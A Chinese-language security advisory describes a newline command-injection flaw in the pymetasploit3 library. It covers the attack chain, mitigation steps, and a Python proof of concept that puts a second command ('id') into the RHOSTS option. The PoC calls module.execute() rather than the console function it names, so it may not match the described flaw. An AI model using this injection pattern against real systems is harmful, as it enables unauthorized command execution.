CVE-2026-5463 pymetasploit3命令注入漏洞

漏洞信息

漏洞编号

CVE-2026-5463

漏洞类型

命令注入

CVSS评分

8.6 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

pymetasploit3

漏洞概述

pymetasploit3是一个用于与Metasploit框架进行交互的Python库。在其1.0.6及之前的版本中，`console.run_module_with_output()`函数被发现存在严重的命令注入漏洞。攻击者可以利用这一缺陷，向模块选项（例如RHOSTS）中精心构造并注入换行符。这种注入行为会破坏原本预期的命令结构，诱骗Metasploit控制台执行额外的非预期命令。成功利用该漏洞可能导致攻击者获得任意命令执行能力，进而操纵Metasploit会话，对受影响系统造成严重的安全风险。

技术细节

该漏洞的根源在于`pymetasploit3`库在调用`console.run_module_with_output()`方法时，未对传入的模块选项参数（如RHOSTS、LHOST等）实施严格的输入验证和过滤机制。Metasploit控制台在解析命令时，通常将换行符视为命令分隔符。攻击者正是利用这一特性，在参数值中插入换行符（`\n`）。当库将这些参数传递给后端控制台时，原本单一的模块配置命令被截断，拼接上了攻击者构造的恶意指令（如系统命令`id`或`whoami`）。由于CVSS向量显示攻击复杂度低（AC:L）、无需权限（PR:N）且无需用户交互（UI:N），该漏洞极易被远程利用。一旦利用成功，攻击者不仅触发了预期的Metasploit模块，还能在底层系统上执行任意命令，甚至窃取或破坏Metasploit的会话数据，对系统的机密性、完整性和可用性构成严重威胁。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标系统正在使用pymetasploit3库（版本<=1.0.6）进行自动化Metasploit交互。

STEP 2

2. 漏洞利用

攻击者向Metasploit模块选项（如RHOSTS）发送特制数据，其中包含换行符（\n）和后续的恶意系统命令。

STEP 3

3. 命令执行

由于`console.run_module_with_output()`未过滤换行符，Metasploit控制台将换行符后的内容视为新命令并执行，导致任意代码执行。

STEP 4

4. 会话劫持与后渗透

攻击者利用执行命令的权限，建立反向Shell，操纵Metasploit会话，或在系统内进行横向移动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept for CVE-2026-5463
# This script demonstrates the command injection vulnerability
# by injecting a newline character into the RHOSTS option.

import pymetasploit3 as msf

def main():
    # Initialize the client connection to the Metasploit RPC server
    # Ensure the RPC service is running before executing
    try:
        client = msf.MsfRpcClient('your_password', port=55553, server='127.0.0.1')
    except Exception as e:
        print(f"Connection failed: {e}")
        return

    # Select a module to exploit (example: auxiliary/scanner/portscan/tcp)
    # The specific module is not critical; the focus is on option handling.
    try:
        module = client.modules.use('auxiliary', 'scanner/portscan/tcp')
    except Exception as e:
        print(f"Module loading failed: {e}")
        return

    # Construct the malicious payload
    # Injecting a newline character (\n) to break the command structure.
    # This causes the console to execute 'id' after setting RHOSTS.
    malicious_rhosts = "192.168.1.1\nid\n"

    print(f"[*] Injecting payload into RHOSTS: {repr(malicious_rhosts)}")
    
    # Set the vulnerable option
    module['RHOSTS'] = malicious_rhosts

    # Execute the module
    # The underlying console.run_module_with_output() will process the injection.
    print("[*] Executing module to trigger command injection...")
    module.execute()

    print("[+] Exploit attempt finished. Check the Metasploit console for 'id' output.")

if __name__ == "__main__":
    main()

影响范围

pymetasploit3 <= 1.0.6

防御指南

临时缓解措施

如果无法立即升级，建议暂停使用受影响版本的pymetasploit3库进行自动化操作。在作为临时缓解措施时，可以在应用层面对传入Metasploit模块的参数（尤其是RHOSTS、LHOST等）进行正则匹配，拒绝包含换行符、回车符及管道符的输入。同时，应监控Metasploit控制台的日志，检测是否存在异常的非预期命令执行记录。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5463
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5463
3 Details https://www.cvedetails.com/cve/CVE-2026-5463/
4 VulDB https://vuldb.com/cve/CVE-2026-5463
5 Link https://github.com/DanMcInerney/pymetasploit3
6 Link https://pypi.org/project/pymetasploit3/